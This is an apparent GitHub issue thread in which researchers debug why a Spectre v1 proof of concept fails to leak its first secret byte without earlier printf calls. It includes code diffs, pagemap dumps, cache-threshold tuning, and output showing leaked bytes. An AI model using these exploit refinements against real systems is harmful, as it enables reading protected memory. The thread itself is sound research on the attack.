Attack not working without printf

[felix-gohla]

Hi all,

when researching the attack, I found a strange thing.
Not sure whether this is the best place for discussion but it seems this is the most recent PoC repository I could find on gh.

What does not work

What I found was that the attack will not work quite right without the initial printfs before leaking bytes.

Hardware

I tested this on:

• AMD Ryzen 7 3700X (Linux 6.1.0-12-amd64, debian 12)
• Intel Xeon Skylake, IBRS (Linux 6.1.0-12-amd64, debian 12) - at least that is what my cloud provider says ^^

The patch to reconstruct the issue

See the following diff I applied to the original source. I am basically removing all printfs before finding the first secret byte.

diff --git a/spectre.c b/spectre.c
index 864d12d..2b4bb64 100644
--- a/spectre.c
+++ b/spectre.c
@@ -324,49 +324,8 @@ int main(int argc,
     sscanf(argv[3], "%d", &len);
   }

-  /* Print git commit hash */
-  #ifdef GIT_COMMIT_HASH
-    printf("Version: commit " GIT_COMMIT_HASH "\n");
-  #endif
-
-  /* Print cache hit threshold */
-  printf("Using a cache hit threshold of %d.\n", cache_hit_threshold);
-
-  /* Print build configuration */
-  printf("Build: ");
-  #ifndef NORDTSCP
-    printf("RDTSCP_SUPPORTED ");
-  #else
-    printf("RDTSCP_NOT_SUPPORTED ");
-  #endif
-  #ifndef NOMFENCE
-    printf("MFENCE_SUPPORTED ");
-  #else
-    printf("MFENCE_NOT_SUPPORTED ");
-  #endif
-  #ifndef NOCLFLUSH
-    printf("CLFLUSH_SUPPORTED ");
-  #else
-    printf("CLFLUSH_NOT_SUPPORTED ");
-  #endif
-  #ifdef INTEL_MITIGATION
-    printf("INTEL_MITIGATION_ENABLED ");
-  #else
-    printf("INTEL_MITIGATION_DISABLED ");
-  #endif
-  #ifdef LINUX_KERNEL_MITIGATION
-    printf("LINUX_KERNEL_MITIGATION_ENABLED ");
-  #else
-    printf("LINUX_KERNEL_MITIGATION_DISABLED ");
-  #endif
-
-  printf("\n");
-
-  printf("Reading %d bytes:\n", len);
-
   /* Start the read loop to read each address */
   while (--len >= 0) {
-    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);

     /* Call readMemoryByte with the required cache hit threshold and
        malicious x address. value and score are arrays that are

Applying that patch, the following output is shown:

Success: 0x02=’?’ score=51 (second best: 0x01=’?’ score=23) <<-- This line changes.
Unclear: 0x68=’h’ score=992 (second best: 0x02=’?’ score=813)
Unclear: 0x65=’e’ score=999 (second best: 0x02=’?’ score=861)
Unclear: 0x20=’ ’ score=992 (second best: 0x02=’?’ score=869)
Unclear: 0x4D=’M’ score=987 (second best: 0x02=’?’ score=857)
Unclear: 0x61=’a’ score=989 (second best: 0x02=’?’ score=843)
Unclear: 0x67=’g’ score=998 (second best: 0x02=’?’ score=838)

The first byte cannot be leaked anymore. Removing all printfs leads to no byte being leaked correctly.

Why?

Currently, I am not sure why that happens. My assumption is that printf somehow changes state of some pages without which the attack does not work.
For this, I added 1 printf and stopped right before it with GDB. Using pagemap, I dumped the page table and had a look at differences before and after the printf (left side is before the printf).

One can see that amongst having a heap now, some additional libc pages are present. Calling malloc instead of printf does not work and still produces wrong bytes.

4c4
< 0x555555556000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /home/rh/spectre/cache-timing/spectre.out
---
> 0x555555556000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /home/rh/spectre/cache-timing/spectre.out
38a39,71
> 0x555555579000     : soft-dirty 1 file/shared 0 swapped 0 present 1 library [heap]
> 0x55555557a000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555557b000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555557c000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555557d000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555557e000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555557f000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555580000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555581000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555582000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555583000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555584000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555585000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555586000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555587000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555588000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555589000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558a000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558b000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558c000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558d000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558e000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x55555558f000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555590000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555591000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555592000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555593000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555594000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555595000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555596000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555597000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555598000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
> 0x555555599000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library [heap]
101c134
< 0x7ffff7e09000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
---
> 0x7ffff7e09000     : soft-dirty 1 file/shared 0 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
156,171c189,204
< 0x7ffff7e40000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e41000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e42000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e43000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e44000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e45000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e46000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e47000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e48000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e49000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4a000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4b000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4c000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4d000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4e000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
< 0x7ffff7e4f000     : soft-dirty 1 file/shared 0 swapped 0 present 0 library /usr/lib/x86_64-linux-gnu/libc.so.6
---
> 0x7ffff7e40000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e41000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e42000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e43000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e44000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e45000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e46000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e47000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e48000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e49000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4a000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4b000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4c000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4d000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4e000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6
> 0x7ffff7e4f000     : soft-dirty 1 file/shared 1 swapped 0 present 1 library /usr/lib/x86_64-linux-gnu/libc.so.6

I would be glad if someone had an idea why this happens. 😊 Actually I am not sure what internal state this printf changes.

[Postrediori]

Still leaking the first byte on Windows (though it can be second best).

• Windows 10 22H2 x64
• Intel i3-7100 Kaby Lake

> spectre_x64_II.exe
Success: 0x06=’?’ score=7 (second best: 0x54=’T’ score=1)
Success: 0x06=’?’ score=15 (second best: 0x68=’h’ score=5)
Success: 0x06=’?’ score=7 (second best: 0x65=’e’ score=1)
Success: 0x20=’ ’ score=2
Success: 0x4D=’M’ score=2
...

>spectre_x86_II.exe 90
Success: 0x54=’T’ score=17 (second best: 0x11=’?’ score=6)
Success: 0x68=’h’ score=7 (second best: 0x21=’!’ score=1)
Success: 0x65=’e’ score=2
Success: 0x20=’ ’ score=7 (second best: 0xE9=’?’ score=1)
Success: 0x4D=’M’ score=9 (second best: 0xE9=’?’ score=2)
Success: 0x61=’a’ score=2
Success: 0x67=’g’ score=2
Success: 0x69=’i’ score=2
Success: 0x63=’c’ score=17 (second best: 0x11=’?’ score=6)
Success: 0x20=’ ’ score=2
Success: 0x57=’W’ score=7 (second best: 0x21=’!’ score=1)
Success: 0x6F=’o’ score=2
Success: 0x72=’r’ score=2
Success: 0x64=’d’ score=7 (second best: 0xE9=’?’ score=1)
Success: 0x73=’s’ score=30 (second best: 0x11=’?’ score=15)
...

[Postrediori]

Tested this on Linux (Kubuntu 23.10 instead of Debian 12) and it seems to depend on hardware and/or threshold value.

Kernel:

$ uname -a
Linux kubuntu 6.5.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Sat Oct  7 01:35:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

CPU:

$ cat /proc/cpuinfo
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 158
model name      : Intel(R) Core(TM) i3-7100 CPU @ 3.90GHz
stepping        : 9
microcode       : 0xf4
cpu MHz         : 800.029
cache size      : 3072 KB
physical id     : 0

At first, initial byte is really missed:

$ ./spectre.out
Unclear: 0x03=’?’ score=760 (second best: 0x02=’?’ score=716)
Unclear: 0x68=’h’ score=999 (second best: 0x03=’?’ score=918)
Unclear: 0x65=’e’ score=995 (second best: 0x03=’?’ score=892)
Unclear: 0x20=’ ’ score=997 (second best: 0x03=’?’ score=919)
Unclear: 0x4D=’M’ score=999 (second best: 0x03=’?’ score=912)
Unclear: 0x61=’a’ score=999 (second best: 0x03=’?’ score=912)
...

With threshold set to 100 it works again:

$ ./spectre.out 100
Unclear: 0x54=’T’ score=679 (second best: 0x00=’?’ score=677)
Unclear: 0x68=’h’ score=998 (second best: 0x00=’?’ score=996)
Unclear: 0x65=’e’ score=999 (second best: 0x00=’?’ score=998)
Unclear: 0x20=’ ’ score=999 (second best: 0x00=’?’ score=998)
Unclear: 0x4D=’M’ score=999 (second best: 0x00=’?’ score=996)
Unclear: 0x61=’a’ score=999 (second best: 0x00=’?’ score=996)
...

Then I thought about removing usage of printf (and any output whatsoever) until all leaked data is collected. So I made a change that writes leaked bytes to shared memory. Note that code is not very effective, I just wanted to make it somewhere outside of process' memory, e.g. stack or heap.

23a24,27
> #include <string.h>
> #include <sys/shm.h>
> #include <errno.h>
> 
294c298,299
<   int len = 40;
---
>   const int total_len = 40;
>   int len = total_len;
299a305,314
>   struct item {
>     int score[2];
>     uint8_t value[2];
>   };
> 
>   key_t shm_key = 0x1337;
>   const int shared_segment_size = sizeof(struct item) * total_len;
>   int segment_id;
>   char* shared_memory;
> 
326a342,369
>   size_t malicious_x_0 = malicious_x;
> 
>   segment_id = shmget(shm_key, shared_segment_size, IPC_CREAT | 0777);
>   if(segment_id < 0) {
>     fprintf(stderr, "shmget error: %s\n", strerror(errno));
>     return 1;
>   }
>   shared_memory = (char*)shmat(segment_id, 0, 0);
>   if(shared_memory == (char*)(-1)) {
>     fprintf(stderr, "shmat error: %s\n", strerror(errno));
>     return 1;
>   }
> 
>   memset(shared_memory, 0, shared_segment_size);
> 
>   struct item* pitem = (struct item*)shared_memory;
> 
>   /* Start the read loop to read each address */
>   while (--len >= 0) {
>     /* Call readMemoryByte with the required cache hit threshold and
>        malicious x address. value and score are arrays that are
>        populated with the results.
>     */
>     readMemoryByte(cache_hit_threshold, malicious_x++, pitem->value, pitem->score);
> 
>     pitem++;
>   }
> 
365c408
<   printf("Reading %d bytes:\n", len);
---
>   pitem = (struct item*)shared_memory;
367,369c410,411
<   /* Start the read loop to read each address */
<   while (--len >= 0) {
<     printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
---
>   len = total_len;
>   malicious_x = malicious_x_0;
371,375c413,416
<     /* Call readMemoryByte with the required cache hit threshold and
<        malicious x address. value and score are arrays that are
<        populated with the results.
<     */
<     readMemoryByte(cache_hit_threshold, malicious_x++, value, score);
---
>   printf("Reading %d bytes:\n", len);
>   while (--len>=0) {
>     printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
>     malicious_x++;
378,380c419,421
<     printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
<     printf("0x%02X=’%c’ score=%d ", value[0],
<       (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
---
>     printf("%s: ", (pitem->score[0] >= 2 * pitem->score[1] ? "Success" : "Unclear"));
>     printf("0x%02X=’%c’ score=%d ", pitem->value[0],
>       (pitem->value[0] > 31 && pitem->value[0] < 127 ? pitem->value[0] : '?'), pitem->score[0]);
382,384c423,425
<     if (score[1] > 0) {
<       printf("(second best: 0x%02X=’%c’ score=%d)", value[1],
<       (value[1] > 31 && value[1] < 127 ? value[1] : '?'), score[1]);
---
>     if (pitem->score[1] > 0) {
>       printf("(second best: 0x%02X=’%c’ score=%d)", pitem->value[1],
>       (pitem->value[1] > 31 && pitem->value[1] < 127 ? pitem->value[1] : '?'), pitem->score[1]);
387a429
>     pitem++;
388a431,434
> 
>   shmdt(shared_memory);
>   shmctl(segment_id, IPC_RMID, NULL);
> 

The result doesn't work with default threshold of 80 (because not a single printf was called) and works almost completely with the value of 100:

$ ./spectre.shmem 100
Using a cache hit threshold of 100.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffffdfe8... Unclear: 0x54=’T’ score=986 (second best: 0x03=’?’ score=882)
Reading at malicious_x = 0xffffffffffffdfe9... Unclear: 0x68=’h’ score=999 (second best: 0x00=’?’ score=996)
Reading at malicious_x = 0xffffffffffffdfea... Unclear: 0x65=’e’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdfeb... Unclear: 0x20=’ ’ score=999 (second best: 0x01=’?’ score=912)
Reading at malicious_x = 0xffffffffffffdfec... Unclear: 0x4D=’M’ score=999 (second best: 0x00=’?’ score=994)
Reading at malicious_x = 0xffffffffffffdfed... Unclear: 0x61=’a’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdfee... Unclear: 0x67=’g’ score=999 (second best: 0x01=’?’ score=912)
Reading at malicious_x = 0xffffffffffffdfef... Unclear: 0x69=’i’ score=999 (second best: 0x01=’?’ score=904)
Reading at malicious_x = 0xffffffffffffdff0... Unclear: 0x63=’c’ score=999 (second best: 0x01=’?’ score=917)
Reading at malicious_x = 0xffffffffffffdff1... Unclear: 0x20=’ ’ score=999 (second best: 0x00=’?’ score=997)
Reading at malicious_x = 0xffffffffffffdff2... Unclear: 0x57=’W’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdff3... Unclear: 0x6F=’o’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdff4... Unclear: 0x72=’r’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdff5... Unclear: 0x64=’d’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdff6... Unclear: 0x73=’s’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdff7... Unclear: 0x20=’ ’ score=995 (second best: 0x00=’?’ score=989)
Reading at malicious_x = 0xffffffffffffdff8... Unclear: 0x00=’?’ score=999 (second best: 0x61=’a’ score=998)
Reading at malicious_x = 0xffffffffffffdff9... Unclear: 0x72=’r’ score=999 (second best: 0x00=’?’ score=957)
Reading at malicious_x = 0xffffffffffffdffa... Unclear: 0x65=’e’ score=999 (second best: 0x01=’?’ score=896)
Reading at malicious_x = 0xffffffffffffdffb... Unclear: 0x20=’ ’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdffc... Unclear: 0x53=’S’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdffd... Unclear: 0x71=’q’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdffe... Unclear: 0x75=’u’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffdfff... Unclear: 0x65=’e’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe000... Unclear: 0x61=’a’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe001... Unclear: 0x6D=’m’ score=999 (second best: 0x00=’?’ score=997)
Reading at malicious_x = 0xffffffffffffe002... Unclear: 0x69=’i’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe003... Unclear: 0x73=’s’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe004... Unclear: 0x68=’h’ score=999 (second best: 0x01=’?’ score=912)
Reading at malicious_x = 0xffffffffffffe005... Unclear: 0x20=’ ’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe006... Unclear: 0x4F=’O’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe007... Unclear: 0x73=’s’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe008... Unclear: 0x73=’s’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe009... Unclear: 0x69=’i’ score=999 (second best: 0x01=’?’ score=886)
Reading at malicious_x = 0xffffffffffffe00a... Unclear: 0x66=’f’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe00b... Unclear: 0x72=’r’ score=999 (second best: 0x00=’?’ score=998)
Reading at malicious_x = 0xffffffffffffe00c... Unclear: 0x61=’a’ score=999 (second best: 0x00=’?’ score=999)
Reading at malicious_x = 0xffffffffffffe00d... Unclear: 0x67=’g’ score=999 (second best: 0x00=’?’ score=998)
Reading at malicious_x = 0xffffffffffffe00e... Unclear: 0x65=’e’ score=999 (second best: 0x01=’?’ score=916)
Reading at malicious_x = 0xffffffffffffe00f... Unclear: 0x2E=’.’ score=999 (second best: 0x00=’?’ score=999)